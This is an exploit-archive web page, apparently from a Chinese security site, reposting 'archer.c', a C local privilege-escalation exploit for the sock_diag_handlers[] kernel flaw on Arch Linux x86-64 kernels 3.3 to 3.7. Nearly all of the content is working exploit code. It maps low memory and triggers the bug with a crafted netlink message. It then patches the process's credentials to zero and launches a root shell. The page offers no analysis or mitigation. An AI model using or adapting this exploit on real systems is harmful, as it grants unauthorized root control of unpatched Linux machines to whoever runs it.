首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Archlinux/x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root
来源:sd@fucksheep.org 作者:sd 发布时间:2013-02-27  

// archer.c
//
// 2012 sd@fucksheep.org
//
// Works reliably against x86-64 3.3-3.7 arch.
//
// Tested against:
//
// Linux XXX 3.3.1-1-ARCH #1 SMP PREEMPT Tue Apr 3 06:46:17 UTC 2012 x86_64 GNU/Linux
// Linux XXX 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux
// Linux XXX 3.7.4-1-ARCH #1 SMP PREEMPT Mon Jan 21 23:05:29 CET 2013 x86_64 GNU/Linux
// ...

#include <assert.h>

#define JUMP 0x0000100000001000LL
#define BASE 0x380000000
#define SIZE 0x010000000
#define KSIZE 0x2000000

static long ugid;

void patch_current() {
        int i,j,k;
        char *current = *(char**)(((long)&i) & (-8192));
        long kbase = ((long)current)>>36;

        for (i=0; i<4000; i+=4) {
                long *p = (void *)&current[i];
                int *t = (void*) p[0];
                if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
                for (j=0; j<20; j++) {
   for (k = 0; k < 8; k++)
                         if (((int*)&ugid)[k%2] != t[j+k]) goto next;
                        for (i = 0; i < 8; i++) t[j+i] = 0;
                        for (i = 0; i < 10; i++) t[j+9+i] = -1;
                        return;
next:;          }
        }
}


int main()
{
 long u = getuid();
 long g = getgid();
 int i, f = socket(16,3,4);
 static int n[10] = {40,0x10014,0,0,45,-1};

 assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1);

 setresuid(u,u,u); setresgid(g,g,g);
 ugid = (g<<32)|u;

 memcpy(1<<12, &patch_current, 1024);
 for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current;
 send(f, n, sizeof(n), 0);
 setuid(0);
 return execl("/bin/bash", "-sh", 0);
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Java Applet JMX Remote Code Ex
·Kordil EDMS v2.2.60rc3 Unauthe
·Microsoft Windows XP Professio
·Glossword v1.8.8 - 1.8.12 Arbi
·Joomla <=2.5.8,<=3.0.2 remote
·PolarPearCms PHP File Upload V
·MS Office 2010 Download Execut
·Photodex ProShow Producer 5.0.
·Fileutils Ruby Gem Remote Comm
·TeamViwer V8.0.16642 Insecure
·Ruby Gem ftpd-0.2.1 Remote Com
·ArrowChat 1.5.61 RFI Vulnerabi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved